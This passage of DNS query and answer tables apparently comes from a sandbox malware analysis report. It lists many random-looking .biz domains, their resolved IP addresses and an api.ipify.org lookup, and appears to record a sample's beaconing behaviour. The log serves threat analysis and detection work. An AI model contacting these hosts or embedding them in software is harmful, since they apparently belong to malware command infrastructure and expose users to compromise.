                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.216659069 CET192.168.2.101.1.1.10x85eaStandard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.273324966 CET192.168.2.101.1.1.10xa639Standard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.197000980 CET192.168.2.101.1.1.10x5319Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.952408075 CET192.168.2.101.1.1.10xd3f3Standard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.245414972 CET192.168.2.101.1.1.10x66dcStandard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.807478905 CET192.168.2.101.1.1.10xacf3Standard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.947033882 CET192.168.2.101.1.1.10x8841Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.866301060 CET192.168.2.101.1.1.10x7050Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.882210016 CET192.168.2.101.1.1.10x797dStandard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.295465946 CET192.168.2.101.1.1.10x8ac9Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.859077930 CET192.168.2.101.1.1.10x83cfStandard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.200109959 CET192.168.2.101.1.1.10xb3c3Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.231291056 CET192.168.2.101.1.1.10xb3c3Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.542856932 CET192.168.2.101.1.1.10xbb55Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.381982088 CET192.168.2.101.1.1.10x58cStandard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.965744972 CET192.168.2.101.1.1.10x8d32Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.236407995 CET192.168.2.101.1.1.10xbddfStandard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.079943895 CET192.168.2.101.1.1.10x922fStandard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.492145061 CET192.168.2.101.1.1.10x2f6bStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.935467958 CET192.168.2.101.1.1.10xd8bbStandard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.965759993 CET192.168.2.101.1.1.10xd8bbStandard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.214063883 CET192.168.2.101.1.1.10xb5f2Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.705864906 CET192.168.2.101.1.1.10x9204Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.800775051 CET192.168.2.101.1.1.10xb74cStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.809329987 CET192.168.2.101.1.1.10xfd4eStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.571599960 CET192.168.2.101.1.1.10xfd4cStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.279855013 CET192.168.2.101.1.1.10xa897Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.937752008 CET192.168.2.101.1.1.10x4e7Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.949760914 CET192.168.2.101.1.1.10x7ffbStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.961751938 CET192.168.2.101.1.1.10xde5Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.012873888 CET192.168.2.101.1.1.10x5ef7Standard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.915997982 CET192.168.2.101.1.1.10x1e31Standard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.606079102 CET192.168.2.101.1.1.10x658aStandard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.472233057 CET192.168.2.101.1.1.10x89abStandard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.176280022 CET192.168.2.101.1.1.10x9b7aStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.199852943 CET192.168.2.101.1.1.10x9b7aStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.121767998 CET192.168.2.101.1.1.10xe1dStandard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.973263025 CET192.168.2.101.1.1.10x8498Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.832979918 CET192.168.2.101.1.1.10x1b85Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.309295893 CET192.168.2.101.1.1.10xb4f1Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.170142889 CET192.168.2.101.1.1.10x4d5aStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.859144926 CET192.168.2.101.1.1.10x6bc4Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207818031 CET192.168.2.101.1.1.10x470aStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.215356112 CET192.168.2.101.1.1.10xf990Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.939558029 CET192.168.2.101.1.1.10xa28Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.692629099 CET192.168.2.101.1.1.10xbb2Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.702120066 CET192.168.2.101.1.1.10x2a3eStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712905884 CET192.168.2.101.1.1.10x45e4Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.934891939 CET192.168.2.101.1.1.10x795cStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.435702085 CET192.168.2.101.1.1.10xa413Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.921685934 CET192.168.2.101.1.1.10xee63Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.949841022 CET192.168.2.101.1.1.10xee63Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.723961115 CET192.168.2.101.1.1.10x6992Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.212035894 CET192.168.2.101.1.1.10x35faStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710921049 CET192.168.2.101.1.1.10xb9d5Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.289922953 CET1.1.1.1192.168.2.100x3fb8No error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:28.444885969 CET1.1.1.1192.168.2.100x2ee6No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.156903028 CET1.1.1.1192.168.2.100x6e36No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.259402037 CET1.1.1.1192.168.2.100xa5cdNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.936779022 CET1.1.1.1192.168.2.100xe995No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.057365894 CET1.1.1.1192.168.2.100xa4b5No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.057365894 CET1.1.1.1192.168.2.100xa4b5No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.057365894 CET1.1.1.1192.168.2.100xa4b5No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.787971020 CET1.1.1.1192.168.2.100x6ce9No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.680777073 CET1.1.1.1192.168.2.100xd4c3No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.166402102 CET1.1.1.1192.168.2.100x9562No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:36.583200932 CET1.1.1.1192.168.2.100xc4bdNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:36.583200932 CET1.1.1.1192.168.2.100xc4bdNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.175905943 CET1.1.1.1192.168.2.100xdb40No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.052706003 CET1.1.1.1192.168.2.100x520No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.052706003 CET1.1.1.1192.168.2.100x520No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.321055889 CET1.1.1.1192.168.2.100xa2c9No error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.351469040 CET1.1.1.1192.168.2.100xd4d0Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.359621048 CET1.1.1.1192.168.2.100xc591No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.905742884 CET1.1.1.1192.168.2.100xdc1aName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.913444996 CET1.1.1.1192.168.2.100xa963Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.930114031 CET1.1.1.1192.168.2.100xbeb7No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.393667936 CET1.1.1.1192.168.2.100x89eaName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.451359034 CET1.1.1.1192.168.2.100x1e42No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.421801090 CET1.1.1.1192.168.2.100x9c94Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.467649937 CET1.1.1.1192.168.2.100x92d3Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.480128050 CET1.1.1.1192.168.2.100xf6c9No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.898901939 CET1.1.1.1192.168.2.100xe9aNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.640888929 CET1.1.1.1192.168.2.100x545aNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.475440979 CET1.1.1.1192.168.2.100x36bdNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.475475073 CET1.1.1.1192.168.2.100x36bdNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.927073002 CET1.1.1.1192.168.2.100x7e9eNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.211215973 CET1.1.1.1192.168.2.100xd42fNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.795874119 CET1.1.1.1192.168.2.100x69No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.529592037 CET1.1.1.1192.168.2.100x7ca0No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.807409048 CET1.1.1.1192.168.2.100xe847No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.554377079 CET1.1.1.1192.168.2.100x2648No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.607156992 CET1.1.1.1192.168.2.100x31a1No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.238786936 CET1.1.1.1192.168.2.100xafe7No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.238786936 CET1.1.1.1192.168.2.100xafe7No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.551224947 CET1.1.1.1192.168.2.100x107aNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.551224947 CET1.1.1.1192.168.2.100x107aNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.625433922 CET1.1.1.1192.168.2.100x62bName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.633425951 CET1.1.1.1192.168.2.100xb664No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.121123075 CET1.1.1.1192.168.2.100xa8baName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.129301071 CET1.1.1.1192.168.2.100xf7aaName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.136902094 CET1.1.1.1192.168.2.100xa93fNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.382411003 CET1.1.1.1192.168.2.100x43b7No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.493922949 CET1.1.1.1192.168.2.100x81bNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.298443079 CET1.1.1.1192.168.2.100x5677No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.905448914 CET1.1.1.1192.168.2.100xdc07No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.528554916 CET1.1.1.1192.168.2.100xcf08No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.332726955 CET1.1.1.1192.168.2.100xe0c1No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.583602905 CET1.1.1.1192.168.2.100x60ffNo error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.578593016 CET1.1.1.1192.168.2.100xdfaaNo error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.415715933 CET1.1.1.1192.168.2.100xb4c5No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.415715933 CET1.1.1.1192.168.2.100xb4c5No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.587639093 CET1.1.1.1192.168.2.100x35baNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.569825888 CET1.1.1.1192.168.2.100x4749No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.587639093 CET1.1.1.1192.168.2.100xad95No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.803790092 CET1.1.1.1192.168.2.100x9c91No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:37.005306959 CET1.1.1.1192.168.2.100xe20cNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.646301031 CET1.1.1.1192.168.2.100x1f8bNo error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.158921957 CET1.1.1.1192.168.2.100xa3b7No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.622997046 CET1.1.1.1192.168.2.100x9aa7No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.644891024 CET1.1.1.1192.168.2.100x1368No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:43.754018068 CET1.1.1.1192.168.2.100x9db4No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.930850983 CET1.1.1.1192.168.2.100x57deNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.692023993 CET1.1.1.1192.168.2.100xf6a6No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.476150036 CET1.1.1.1192.168.2.100xb50No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.120292902 CET1.1.1.1192.168.2.100x204fNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.181557894 CET1.1.1.1192.168.2.100x94b2No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:51.881726980 CET1.1.1.1192.168.2.100x614aNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.700316906 CET1.1.1.1192.168.2.100x1409No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:54.763137102 CET1.1.1.1192.168.2.100xa6d5No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.769454956 CET1.1.1.1192.168.2.100xd737No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.208944082 CET1.1.1.1192.168.2.100x5e68No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.875849009 CET1.1.1.1192.168.2.100xcfbdNo error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.723516941 CET1.1.1.1192.168.2.100x7462No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.178086042 CET1.1.1.1192.168.2.100x358No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.213181019 CET1.1.1.1192.168.2.100xf938No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.480237007 CET1.1.1.1192.168.2.100x1a48No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.898606062 CET1.1.1.1192.168.2.100xf7beNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.152344942 CET1.1.1.1192.168.2.100xa89bNo error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.390362978 CET1.1.1.1192.168.2.100x8829No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.390362978 CET1.1.1.1192.168.2.100x8829No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.284394026 CET1.1.1.1192.168.2.100x372aNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.757179976 CET1.1.1.1192.168.2.100xd431No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.999672890 CET1.1.1.1192.168.2.100xb0baNo error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.510721922 CET1.1.1.1192.168.2.100xeb0dNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.046273947 CET1.1.1.1192.168.2.100x198bNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.188525915 CET1.1.1.1192.168.2.100x199No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
